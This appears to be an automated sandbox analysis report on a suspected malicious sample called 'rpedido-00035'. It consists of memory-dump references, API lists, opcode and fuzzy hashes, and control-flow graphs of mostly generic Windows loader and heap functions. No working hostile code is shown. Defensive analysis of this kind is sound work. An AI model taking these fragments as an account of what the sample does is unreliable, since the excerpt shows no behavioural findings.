                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          Function 00405E07 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                          • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

                                                          Execution Graph

                                                          Execution Coverage:0%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:23.7%
                                                          Total number of Nodes:139
                                                          Total number of Limit Nodes:0
                                                          execution_graph 48565 36006e00 RtlDebugPrintTimes RtlDebugPrintTimes 48566 36016e00 22 API calls 48567 360a3608 394 API calls 48568 3603d600 296 API calls 48683 36018009 253 API calls 48684 3605100e 258 API calls 48685 3600ec0b 271 API calls 48686 3600640d 398 API calls 48570 36009610 264 API calls 48687 3604dc14 264 API calls 48688 36012410 257 API calls 48689 36042c10 261 API calls 48572 3600821b 268 API calls 48573 3609b214 257 API calls 48574 3600b620 GetPEB RtlDebugPrintTimes GetPEB 48692 3600b420 9 API calls 48693 36012022 14 API calls 48576 3602fe2f LdrInitializeThunk RtlDebugPrintTimes 48578 36007a30 258 API calls 48695 360cc03d 264 API calls 48580 36012e32 264 API calls 48696 36040030 253 API calls 48582 36047a33 312 API calls 48585 360d124c 28 API calls 48586 3603ea40 275 API calls 48587 3604f240 258 API calls 48588 3600fa44 7 API calls 48593 3600b260 274 API calls 48698 36007060 RtlDebugPrintTimes 48699 3600dc60 258 API calls 48595 360c0e6d 79 API calls 48700 36013c60 12 API calls 48701 360b9060 20 API calls 48597 36017a6f RtlDebugPrintTimes GetPEB GetPEB 48598 360a327e 11 API calls 48599 3604ce70 25 API calls 48703 36016074 264 API calls 48604 3600ca84 256 API calls 48705 36007c85 260 API calls 48606 3600a290 384 API calls 48607 3600fe90 6 API calls 48707 3600c090 264 API calls 48609 36017290 14 API calls 48610 3602d690 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 48611 36092e9f 292 API calls 48612 360d0ead GetPEB LdrInitializeThunk GetPEB GetPEB GetPEB 48614 360106a0 268 API calls 48708 360100a0 407 API calls 48616 3604cea0 296 API calls 48709 3600e0a4 267 API calls 48618 360522a0 344 API calls 48619 360082b0 255 API calls 48710 3600b0c0 310 API calls 48623 36013ec0 14 API calls 48625 360432c0 256 API calls 48711 36046cc0 260 API calls 48712 3609a4c1 LdrInitializeThunk 48713 3601fcc9 GetPEB GetPEB GetPEB RtlDebugPrintTimes 48626 360b86c2 GetPEB GetPEB GetPEB RtlDebugPrintTimes GetPEB 48627 360ccedc 263 API calls 48714 36011cd0 259 API calls 48715 3603f4d0 266 API calls 48717 36038cdf 254 API calls 48718 360a3cd4 6 API calls 48628 360072e0 253 API calls 48630 360156e0 295 API calls 48631 360d02ec 10 API calls 48632 360366e0 316 API calls 48633 36013ee2 7 API calls 48634 36019ae4 267 API calls 48637 36030aeb 295 API calls 48638 360362e9 265 API calls 48722 360164f0 RtlDebugPrintTimes GetPEB 48723 3603acf0 13 API calls 48639 360496f0 259 API calls 48640 360462f0 292 API calls 48641 36018af4 GetPEB GetPEB RtlDebugPrintTimes 48726 360394fa 254 API calls 48642 360df6f6 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48643 360c36f7 258 API calls 48644 360202f9 260 API calls 48727 360a8d0a 257 API calls 48729 36040100 255 API calls 48645 3609330c 256 API calls 48646 36018b10 263 API calls 48647 3603cb10 GetPEB GetPEB GetPEB GetPEB 48648 360c9313 LdrInitializeThunk GetPEB RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48650 36006b20 272 API calls 48651 3608fb28 20 API calls 48733 36041527 257 API calls 48652 3604ab20 257 API calls 48653 3604cb20 14 API calls 48654 36048322 394 API calls 48736 36049d2c 283 API calls 48655 3600a740 303 API calls 48741 3602e547 277 API calls 48657 360ce347 23 API calls 48742 36048d4f 278 API calls 48658 3603ff50 391 API calls 48660 3604a350 309 API calls 48743 3604415f 256 API calls 48662 3600bf70 GetPEB LdrInitializeThunk 48746 3600c170 298 API calls 48663 36011f70 25 API calls 48664 3603af72 21 API calls 48747 36015570 296 API calls 48665 3603a370 93 API calls 48666 3608e372 258 API calls 48667 360c8770 254 API calls 48668 360b8f76 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48669 36011380 67 API calls 48670 360caf8d 91 API calls 48749 36049580 299 API calls 48750 3602fd85 11 API calls 48751 3600cd8a 256 API calls 48752 360ad586 126 API calls 48753 36016d91 GetPEB GetPEB GetPEB 48754 360d959f 7 API calls 48672 36049790 301 API calls 48561 36052b90 LdrInitializeThunk 48673 36093f9f GetPEB RtlDebugPrintTimes 48756 36008196 GetPEB GetPEB 48757 360c0593 13 API calls 48759 36007da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48760 360e15ba GetPEB GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 48675 36048fbc 278 API calls 48676 3600e3c0 295 API calls 48677 3600bfc0 GetPEB GetPEB GetPEB GetPEB GetPEB 48678 36091fc9 421 API calls 48762 360081c0 GetPEB 48763 36011dc0 6 API calls 48764 3604c5c6 393 API calls 48765 360251c0 260 API calls 48680 36009fd0 254 API calls 48768 3600c1d0 254 API calls 48769 36029dd0 269 API calls 48772 360171f0 349 API calls 48682 36038ffb 255 API calls 48773 360ea1f0 8 API calls

                                                          Executed Functions

                                                          Function 360534E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3 360534e0-360534ec LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d4dbf90a420777a47b7f5abfdd7113c9248f4d600fd68afc89eb0601385a0e39
                                                          • Instruction ID: 83212c6f086d19956c2fd3748906b31c57db104d71670bc73865ae2366c1c30f
                                                          • Opcode Fuzzy Hash: d4dbf90a420777a47b7f5abfdd7113c9248f4d600fd68afc89eb0601385a0e39
                                                          • Instruction Fuzzy Hash: FB90023160510406D54061594655706140587D0209F61C856A1414529DC7E5895575B3
                                                          Function 36052EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2 36052eb0-36052ebc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e460c5b4147f81360f920510c174fbd1a72f46f2c04cc6587843895eadd673f8
                                                          • Instruction ID: 645d8939edc0391038c5f68c6af994ddad910f8772ab04188e7619ef46c58497
                                                          • Opcode Fuzzy Hash: e460c5b4147f81360f920510c174fbd1a72f46f2c04cc6587843895eadd673f8
                                                          • Instruction Fuzzy Hash: 8B90023120140406D5406159495570B040587D030AF51C456A2154516DC67588557572
                                                          Function 36052B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 36052b90-36052b9c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 40b584266e42f2f8621a7bf7d9064f76d4c6dc3e36c99be175355a423e7fbed9
                                                          • Instruction ID: 809932fc17719608b3594c8a7ba4781903ffcd0a7cebf49e0d60134841a11a11
                                                          • Opcode Fuzzy Hash: 40b584266e42f2f8621a7bf7d9064f76d4c6dc3e36c99be175355a423e7fbed9
                                                          • Instruction Fuzzy Hash: 1190023120108806D5506159854574A040587D0309F55C856A5414619DC6E588957132
                                                          Function 36052BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1 36052bc0-36052bcc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 66b3a7bbe0936f9329721553057e90db1e89fbeefe8a2f485373db42c884988c
                                                          • Instruction ID: 58faec57f572c65699304765922dfbc9d406bd097d97a89c95d538e3b0177f05
                                                          • Opcode Fuzzy Hash: 66b3a7bbe0936f9329721553057e90db1e89fbeefe8a2f485373db42c884988c
                                                          • Instruction Fuzzy Hash: 1990023120100406D54065995549646040587E0309F51D456A6014516EC6B588957132

                                                          Non-executed Functions

                                                          Function 360B9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 378 360b9060-360b90a9 379 360b90ab-360b90b0 378->379 380 360b90f8-360b9107 378->380 382 360b90b4-360b90ba 379->382 381 360b9109-360b910e 380->381 380->382 383 360b9893-360b98a7 call 36054b50 381->383 384 360b90c0-360b90e4 call 36058f40 382->384 385 360b9215-360b923d call 36058f40 382->385 394 360b9113-360b91b4 GetPEB call 360bd7e5 384->394 395 360b90e6-360b90f3 call 360d92ab 384->395 392 360b923f-360b925a call 360b98aa 385->392 393 360b925c-360b9292 385->393 399 360b9294-360b9296 392->399 393->399 405 360b91d2-360b91e7 394->405 406 360b91b6-360b91c4 394->406 404 360b91fd-360b9210 RtlDebugPrintTimes 395->404 399->383 403 360b929c-360b92b1 RtlDebugPrintTimes 399->403 403->383 412 360b92b7-360b92be 403->412 404->383 405->404 408 360b91e9-360b91ee 405->408 406->405 407 360b91c6-360b91cb 406->407 407->405 410 360b91f3-360b91f6 408->410 411 360b91f0 408->411 410->404 411->410 412->383 414 360b92c4-360b92df 412->414 415 360b92e3-360b92f4 call 360ba388 414->415 418 360b92fa-360b92fc 415->418 419 360b9891 415->419 418->383 420 360b9302-360b9309 418->420 419->383 421 360b930f-360b9314 420->421 422 360b947c-360b9482 420->422 423 360b933c 421->423 424 360b9316-360b931c 421->424 425 360b9488-360b94b7 call 36058f40 422->425 426 360b961c-360b9622 422->426 428 360b9340-360b9391 call 36058f40 RtlDebugPrintTimes 423->428 424->423 427 360b931e-360b9332 424->427 444 360b94b9-360b94c4 425->444 445 360b94f0-360b9505 425->445 430 360b9674-360b9679 426->430 431 360b9624-360b962d 426->431 434 360b9338-360b933a 427->434 435 360b9334-360b9336 427->435 428->383 472 360b9397-360b939b 428->472 432 360b9728-360b9731 430->432 433 360b967f-360b9687 430->433 431->415 438 360b9633-360b966f call 36058f40 431->438 432->415 443 360b9737-360b973a 432->443 440 360b9689-360b968d 433->440 441 360b9693-360b96bd call 360b8093 433->441 434->428 435->428 457 360b9869 438->457 440->432 440->441 469 360b9888-360b988c 441->469 470 360b96c3-360b971e call 36058f40 RtlDebugPrintTimes 441->470 446 360b97fd-360b9834 call 36058f40 443->446 447 360b9740-360b978a 443->447 448 360b94cf-360b94ee 444->448 449 360b94c6-360b94cd 444->449 451 360b9511-360b9518 445->451 452 360b9507-360b9509 445->452 480 360b983b-360b9842 446->480 481 360b9836 446->481 454 360b978c 447->454 455 360b9791-360b979e 447->455 456 360b9559-360b9576 RtlDebugPrintTimes 448->456 449->448 460 360b953d-360b953f 451->460 458 360b950b-360b950d 452->458 459 360b950f 452->459 454->455 466 360b97aa-360b97ad 455->466 467 360b97a0-360b97a3 455->467 456->383 484 360b957c-360b959f call 36058f40 456->484 468 360b986d 457->468 458->451 459->451 464 360b951a-360b9524 460->464 465 360b9541-360b9557 460->465 477 360b952d 464->477 478 360b9526 464->478 465->456 475 360b97b9-360b97fb 466->475 476 360b97af-360b97b2 466->476 467->466 474 360b9871-360b9886 RtlDebugPrintTimes 468->474 469->415 470->383 511 360b9724 470->511 482 360b93eb-360b9400 472->482 483 360b939d-360b93a5 472->483 474->383 474->469 475->474 476->475 488 360b952f-360b9531 477->488 478->465 486 360b9528-360b952b 478->486 489 360b984d 480->489 490 360b9844-360b984b 480->490 481->480 485 360b9406-360b9414 482->485 491 360b93d2-360b93e9 483->491 492 360b93a7-360b93d0 call 360b8093 483->492 508 360b95bd-360b95d8 484->508 509 360b95a1-360b95bb 484->509 495 360b9418-360b946f call 36058f40 RtlDebugPrintTimes 485->495 486->488 497 360b953b 488->497 498 360b9533-360b9535 488->498 499 360b9851-360b9857 489->499 490->499 491->485 492->495 495->383 514 360b9475-360b9477 495->514 497->460 498->497 504 360b9537-360b9539 498->504 505 360b9859-360b985c 499->505 506 360b985e-360b9864 499->506 504->460 505->457 506->468 507 360b9866 506->507 507->457 512 360b95dd-360b960b RtlDebugPrintTimes 508->512 509->512 511->432 512->383 516 360b9611-360b9617 512->516 514->469 516->443
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $ $0
                                                          • API String ID: 3446177414-3352262554
                                                          • Opcode ID: eb62f5132ab146bda0f07e9fd2055bd26c2d60854ad3028ee9dbf61a96cd987e
                                                          • Instruction ID: 8310582bd910f7fd8034f72c817509a665397a6c4eb5222c32a80c7ce0e87e58
                                                          • Opcode Fuzzy Hash: eb62f5132ab146bda0f07e9fd2055bd26c2d60854ad3028ee9dbf61a96cd987e
                                                          • Instruction Fuzzy Hash: EE3223B1A083818FE750CF69C885B5BBBE5BF89344F00896EF5D987250D7B5D848CB52
                                                          Function 36048540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 517 36048540-360485a1 518 360485a7-360485b8 517->518 519 360850a2-360850a8 517->519 519->518 520 360850ae-360850bb GetPEB 519->520 520->518 521 360850c1-360850c4 520->521 522 360850e1-36085107 call 36052c00 521->522 523 360850c6-360850d0 521->523 522->518 529 3608510d-36085111 522->529 523->518 524 360850d6-360850df 523->524 526 36085138-3608514c call 360153c0 524->526 532 36085152-3608515e 526->532 529->518 531 36085117-3608512c call 36052c00 529->531 531->518 540 36085132 531->540 534 36085164-36085178 532->534 535 36085367-36085373 call 36085378 532->535 538 3608517a 534->538 539 36085196-3608520c 534->539 535->518 542 3608517c-36085183 538->542 545 3608520e-36085240 call 3600fcf0 539->545 546 36085245-36085248 539->546 540->526 542->539 544 36085185-36085187 542->544 549 36085189-3608518c 544->549 550 3608518e-36085190 544->550 559 36085358-3608535d call 3609a130 545->559 547 3608524e-3608529f 546->547 548 3608531f-36085322 546->548 556 360852d9-3608531d call 3600fcf0 * 2 547->556 557 360852a1-360852d7 call 3600fcf0 547->557 553 36085360-36085362 548->553 554 36085324-36085353 call 3600fcf0 548->554 549->542 550->539 550->553 553->532 554->559 556->559 557->559 559->553
                                                          Strings
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 360852D9
                                                          • Thread identifier, xrefs: 36085345
                                                          • Critical section debug info address, xrefs: 3608522A, 36085339
                                                          • 8, xrefs: 360850EE
                                                          • double initialized or corrupted critical section, xrefs: 36085313
                                                          • Critical section address, xrefs: 36085230, 360852C7, 3608533F
                                                          • Invalid debug info address of this critical section, xrefs: 360852C1
                                                          • Critical section address., xrefs: 3608530D
                                                          • Address of the debug info found in the active list., xrefs: 360852B9, 36085305
                                                          • corrupted critical section, xrefs: 360852CD
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36085215, 360852A1, 36085324
                                                          • undeleted critical section in freed memory, xrefs: 36085236
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 3608534E
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 360852ED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 6e7a532b2bfd39f97af5874cd1fd618d63da3a00aa8a24e11571d403c6b3a94a
                                                          • Instruction ID: d25b54d6383a3e489b8a597a2337a910787c0580a5babd8a15f283b34d2a00cb
                                                          • Opcode Fuzzy Hash: 6e7a532b2bfd39f97af5874cd1fd618d63da3a00aa8a24e11571d403c6b3a94a
                                                          • Instruction Fuzzy Hash: 758198B1900318AFEB51CF95C981B9EBFF5BB08314F2145A9E904B7650D776A944CFA0
                                                          Function 360BFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 569 360bfdf4-360bfe16 call 36067be4 572 360bfe18-360bfe30 RtlDebugPrintTimes 569->572 573 360bfe35-360bfe4d call 36007662 569->573 577 360c02d1-360c02e0 572->577 578 360bfe53-360bfe69 573->578 579 360c0277 573->579 580 360bfe6b-360bfe6e 578->580 581 360bfe70-360bfe72 578->581 582 360c027a-360c02ce call 360c02e6 579->582 583 360bfe73-360bfe8a 580->583 581->583 582->577 585 360bfe90-360bfe93 583->585 586 360c0231-360c023a GetPEB 583->586 585->586 588 360bfe99-360bfea2 585->588 590 360c023c-360c0257 GetPEB call 3600b910 586->590 591 360c0259-360c025e call 3600b910 586->591 593 360bfebe-360bfed1 call 360c0835 588->593 594 360bfea4-360bfebb call 3601fed0 588->594 596 360c0263-360c0274 call 3600b910 590->596 591->596 604 360bfedc-360bfef0 call 3600753f 593->604 605 360bfed3-360bfeda 593->605 594->593 596->579 608 360bfef6-360bff02 GetPEB 604->608 609 360c0122-360c0127 604->609 605->604 610 360bff70-360bff7b 608->610 611 360bff04-360bff07 608->611 609->582 612 360c012d-360c0139 GetPEB 609->612 617 360c0068-360c007a call 36022710 610->617 618 360bff81-360bff88 610->618 613 360bff09-360bff24 GetPEB call 3600b910 611->613 614 360bff26-360bff2b call 3600b910 611->614 615 360c013b-360c013e 612->615 616 360c01a7-360c01b2 612->616 629 360bff30-360bff51 call 3600b910 GetPEB 613->629 614->629 620 360c015d-360c0162 call 3600b910 615->620 621 360c0140-360c015b GetPEB call 3600b910 615->621 616->582 625 360c01b8-360c01c3 616->625 640 360c0110-360c011d call 360c0d24 call 360c0835 617->640 641 360c0080-360c0087 617->641 618->617 624 360bff8e-360bff97 618->624 639 360c0167-360c017b call 3600b910 620->639 621->639 632 360bff99-360bffa9 624->632 633 360bffb8-360bffbc 624->633 625->582 626 360c01c9-360c01d4 625->626 626->582 634 360c01da-360c01e3 GetPEB 626->634 629->617 659 360bff57-360bff6b 629->659 632->633 642 360bffab-360bffb5 call 360cd646 632->642 635 360bffce-360bffd4 633->635 636 360bffbe-360bffcc call 36043ae9 633->636 643 360c01e5-360c0200 GetPEB call 3600b910 634->643 644 360c0202-360c0207 call 3600b910 634->644 646 360bffd7-360bffe0 635->646 636->646 671 360c017e-360c0188 GetPEB 639->671 640->609 649 360c0089-360c0090 641->649 650 360c0092-360c009a 641->650 642->633 668 360c020c-360c022c call 360b823a call 3600b910 643->668 644->668 657 360bfff2-360bfff5 646->657 658 360bffe2-360bfff0 646->658 649->650 661 360c009c-360c00ac 650->661 662 360c00b8-360c00bc 650->662 669 360c0065 657->669 670 360bfff7-360bfffe 657->670 658->657 659->617 661->662 672 360c00ae-360c00b3 call 360cd646 661->672 665 360c00ec-360c00f2 662->665 666 360c00be-360c00d1 call 36043ae9 662->666 677 360c00f5-360c00fc 665->677 683 360c00e3 666->683 684 360c00d3-360c00e1 call 3603fdb9 666->684 668->671 669->617 670->669 676 360c0000-360c000b 670->676 671->582 678 360c018e-360c01a2 671->678 672->662 676->669 681 360c000d-360c0016 GetPEB 676->681 677->640 682 360c00fe-360c010e 677->682 678->582 686 360c0018-360c0033 GetPEB call 3600b910 681->686 687 360c0035-360c003a call 3600b910 681->687 682->640 690 360c00e6-360c00ea 683->690 684->690 693 360c003f-360c005d call 360b823a call 3600b910 686->693 687->693 690->677 693->669
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 3446177414-1700792311
                                                          • Opcode ID: 5cd7b34e0bdb0dee678f76a52a4fe2946c3bd56fc334940fbdf08bb06b28cd92
                                                          • Instruction ID: 666d1f370a84e8b82ad36bc8209759c2366a55b9341fe9262b45971707c15d83
                                                          • Opcode Fuzzy Hash: 5cd7b34e0bdb0dee678f76a52a4fe2946c3bd56fc334940fbdf08bb06b28cd92
                                                          • Instruction Fuzzy Hash: 16D1FC39900646DFEB02CFA8C942AADBFF2FF49304F0484C9E446AB252C736D981CB51
                                                          Function 360B86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1346 360b86c2-360b873a GetPEB call 36010670 1349 360b8892-360b889a 1346->1349 1350 360b8740-360b875e call 360142b0 1346->1350 1352 360b889b-360b88b0 call 36054b50 1349->1352 1355 360b877f-360b8787 1350->1355 1356 360b8760-360b8779 call 36057ad0 1350->1356 1359 360b8789-360b879e call 36044f11 1355->1359 1360 360b87b7-360b87c0 1355->1360 1356->1349 1356->1355 1359->1349 1366 360b87a4-360b87ac 1359->1366 1360->1349 1361 360b87c6-360b87c8 1360->1361 1361->1352 1365 360b87ce-360b87dc 1361->1365 1367 360b87e8-360b87ee 1365->1367 1366->1349 1368 360b87b2 1366->1368 1369 360b87de-360b87e2 1367->1369 1370 360b87f0 1367->1370 1368->1352 1371 360b87f2-360b87f4 1369->1371 1372 360b87e4-360b87e5 1369->1372 1373 360b884f-360b8875 call 36044e50 1370->1373 1371->1373 1375 360b87f6-360b87ff 1371->1375 1372->1367 1373->1352 1378 360b8877-360b8890 call 36057ad0 1373->1378 1375->1373 1377 360b8801-360b8803 1375->1377 1379 360b8807-360b881b call 36057ad0 1377->1379 1378->1349 1378->1352 1384 360b8839 1379->1384 1385 360b881d 1379->1385 1387 360b883d-360b884d 1384->1387 1386 360b8820-360b8829 1385->1386 1386->1386 1388 360b882b-360b8835 1386->1388 1387->1373 1387->1379 1388->1349 1389 360b8837 1388->1389 1389->1387
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
